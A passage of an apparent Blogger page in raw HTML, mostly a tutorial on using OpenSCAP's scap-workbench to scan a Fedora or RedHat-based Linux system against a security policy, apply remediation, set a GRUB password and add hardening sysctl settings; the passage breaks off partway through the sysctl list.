/></a></p><p><br /></p><h3 style="text-align: left;"><span style="font-family: inherit; font-size: medium;">References</span></h3><p><span style="font-family: inherit; font-size: medium;">For further reference about STIG policies and the ability to view them on mac OS, check out how to use the STIG Viewer for macOS at:</span></p><p><span style="font-family: inherit; font-size: medium;">https://jyeee.medium.com/stig-viewer-on-macos-1aa0ccffb978</span></p><p><span style="font-family: inherit; font-size: medium;">It will require Java be installed:</span></p><p><span style="font-family: inherit; font-size: medium;">https://www.oracle.com/java/technologies/downloads/#jdk21-mac</span></p><p><br /></p></div>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-51983416533034204752023-10-20T11:54:00.008-07:002023-10-20T11:54:58.335-07:00Linux Security Baseline Compliance using OpenScap<p dir="ltr" style="line-height: 1.38; margin-bottom: 3pt; margin-top: 0pt;"><span style="background-color: transparent; color: #9900ff; font-family: Arial,sans-serif; font-size: 26pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">OpenScap</span></p><h3 dir="ltr" style="background-color: white; line-height: 1.32; margin-bottom: 0pt; margin-top: 0pt; padding: 12pt 0pt 8pt 0pt;"><span style="background-color: transparent; color: #cc0000; font-family: Arial,sans-serif; font-size: 18pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Tools</span></h3><p dir="ltr" style="background-color: white; line-height: 1.6363636363636362; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 8pt 0pt;"><span style="background-color: transparent; color: #333333; font-family: Arial,sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">The OpenSCAP ecosystem provides multiple tools to assist administrators and auditors</span><span style="background-color: transparent; color: #333333; font-family: Arial,sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> with assessment, measurement, and enforcement of security baselines.</span></p><h3 dir="ltr" style="background-color: white; line-height: 1.32; margin-bottom: 0pt; margin-top: 0pt; padding: 7pt 0pt 8pt 0pt;"><span style="background-color: transparent; color: #007a87; font-family: Arial,sans-serif; font-size: 18pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Security Policies</span></h3><p dir="ltr" style="background-color: white; line-height: 1.6363636363636362; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 8pt 0pt;"><span style="background-color: transparent; color: #333333; font-family: Arial,sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">The OpenSCAP project provides a wide variety of hardening guides and configuration baselines developed by the open source community, ensuring that </span><span style="background-color: transparent; color: #333333; font-family: Arial,sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">you can choose a security policy which best suits the needs of your organization</span><span style="background-color: transparent; color: #333333; font-family: Arial,sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">, regardless of its size.</span></p><h3 dir="ltr" style="background-color: white; line-height: 1.32; margin-bottom: 0pt; margin-top: 0pt; padding: 7pt 0pt 8pt 0pt;"><span style="background-color: transparent; color: #57a121; font-family: Arial,sans-serif; font-size: 18pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Standards</span></h3><p dir="ltr" style="background-color: white; line-height: 1.6363636363636362; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 8pt 0pt;"><span style="background-color: transparent; color: #333333; font-family: Arial,sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Security Content Automation Protocol (</span><a href="https://www.open-scap.org/#" style="text-decoration: none;"><span style="background-color: transparent; color: #337ab7; font-family: Arial,sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">SCAP</span></a><span style="background-color: transparent; color: #333333; font-family: Arial,sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">) is U.S. standard maintained by National Institute of Standards and Technology (</span><a href="https://www.open-scap.org/#" style="text-decoration: none;"><span style="background-color: transparent; color: #337ab7; font-family: Arial,sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">NIST</span></a><span style="background-color: transparent; color: #333333; font-family: Arial,sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">). </span><span style="background-color: transparent; color: #333333; font-family: Arial,sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">The OpenSCAP project is a collection of open source tools for implementing and enforcing this standard</span><span style="background-color: transparent; color: #333333; font-family: Arial,sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">, and has been awarded the SCAP 1.2 certification by NIST in 2014.</span></p><p dir="ltr" style="background-color: white; line-height: 1.6363636363636362; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 8pt 0pt;"><br /></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Note: All of the above paragraphs were directly quoted from: </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.open-scap.org/" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://www.open-scap.org/</span></a></p><p><b id="docs-internal-guid-7da843ad-7fff-72af-8df7-6c54a18ea41d" style="font-weight: normal;"><br /></b></p><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">How Do You Use OpenSCAP?</span></h2><p><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Unfortunately, support for Windows ended in 2022. However, Linux still allows for systems to be verified for assessment, measurement, and enforcement of security policies.</span></p><p><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">The process breaks down to the following steps:</span></p><ul style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Install the scap-workbench software and related openscap files.</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Optionally, customize or install your own custom security policy</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Administratively use scap-workbench and choose a policy to test the system for compliance</span></p></li><ul style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;"><li aria-level="2" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: circle; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Scan your system to verify pass or failure compliance with the selected policy</span></p></li><li aria-level="2" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: circle; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Save remediation scripts, execute them and restart the system</span></p></li></ul><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Repeat the indented steps above until compliance with the policy is achieved</span></p></li></ul><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Installing OpenSCAP</span></h2><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">The easiest way to use OpenSCAP is to install the GUI scap-workbench software package. In your terminal window, type the following to install that package. </span><span style="font-family: Arial, sans-serif; font-size: 14.6667px; white-space-collapse: preserve;">Assuming a RedHat-based distribution, sudo privileges and a running terminal window:</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial, sans-serif; font-size: 14.6667px; white-space-collapse: preserve;"><br /></span></p><ul style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">sudo dnf -y install scap-workbench </span><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># provide your own password </span></p></li></ul><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Insuring Compliance with a Policy</span></h2><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">The following steps can be performed after you have installed the scap-workbench package.You may have to repeat and troubleshoot issues in order to have compliance with the policy that you have selected:</span></p><ol style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 36pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Type: </span><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">sudo scap-workbench</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 36pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Select content to load to match the Linux distribution in use</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 36pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Click the Load content button</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 36pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Review the Rules to be checked and click the Scan button</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 36pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Use the Save Results, and Generate remediation role buttons to at least generate a bash remediation script</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 36pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Click the Show Report button to review pass and fail results</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 36pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Press CTRL+q or use File menu, then Quit</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 36pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Navigate to the directory where the bash script was saved and type: </span><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">sudo ./remediation.sh</span><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> </span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 36pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Watch to see what changes to your system are being made, as errors may occur. You should reboot the system and then verify that this profile has been properly applied by starting at the first step. If there are errors, you may need to troubleshoot the problem including doing research to fix issues or seek help from others. If there are no failures, then this process is complete.</span></p></li></ol><p><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">After executing the remediation.sh script in Fedora Workstation 38, and scanning the system, I still found this one error:</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span style="border: none; display: inline-block; height: 380px; overflow: hidden; width: 624px;"><img height="467.99999999999994" src="https://lh7-us.googleusercontent.com/_ssqpHmI11sOZSR1Z7JTTyIc61va6BxFEgKwIwFrK5py-GM86_lrVN0JOiYgNmfOpOyFqnlSxjRelJ9HNFuZwwXuX_YOAl6TnkIIOwn12rrtpGrjvt3wziRXMWvxOt4nOr-PnkgJSNurQQ_IItZpzu8" style="margin-left: 0px; margin-top: -88px;" width="624" /></span></span></p><p><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Since this is an UEFI issue it had to be fixed by setting a UEFI password for the Grand Unified Boot Loader (GRUB). In this case using GRUB, the following command has resolved this issue: </span></p><p><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">sudo</span><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> </span><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">grub2-setpassword</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># provide the same password twice</span></p><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Creating /etc/sysctl/open-scap.conf</span></h2><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Setting the GRUB password required to edit how to start from the GRUB menu did fix this one last problem. However, when I rebooted many more failures were listed when I repeated the scan! Running the remediation script did nothing, so I had to read through the output to create a /etc/sysctl.d/<relevant name>.conf file. In this file, sysctl values are set which change how the Linux kernel behaves. I had to manually provide a solution by viewing each failure and create an entry as recommended manually in /etc/sysctl.d/open-scap.conf. To save you a lot of time, I have provided the open-scap.conf file I created.</span></p><p><b style="font-weight: normal;"><br /></b></p><ol style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Select the lines of the /etc/sysctl.d/open-scap.conf entries in bold below these steps, and right click, Copy to copy them.</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Switch back to the terminal and execute the following command to create the file:</span></p></li></ol><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: 36pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">sudo nano /etc/sysctl.d/open-scap.conf</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: 36pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># provide your own password</span></p><ol start="3" style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Now, right click and choose Paste. You should see the content has been added.</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Press Ctrl-x to exit. Press Enter to keep the name, and type a ‘y’ to save your changes.</span></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Reboot the system, log back in again, repeat the procedure to ensure compliance with the policy.</span></p></li></ol><p><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Contents of /etc/sysctl.d/open-scap.conf:</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># settings recommended by oscap for /etc/sysctl.d/open-scap.conf</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">kernel.kptr_restrict = 1</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">net.ipv4.conf.all.accept_redirects = 0</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">net.ipv4.conf.all.log_martians = 1</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">net.ipv4.conf.all.rp_filter = 1</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 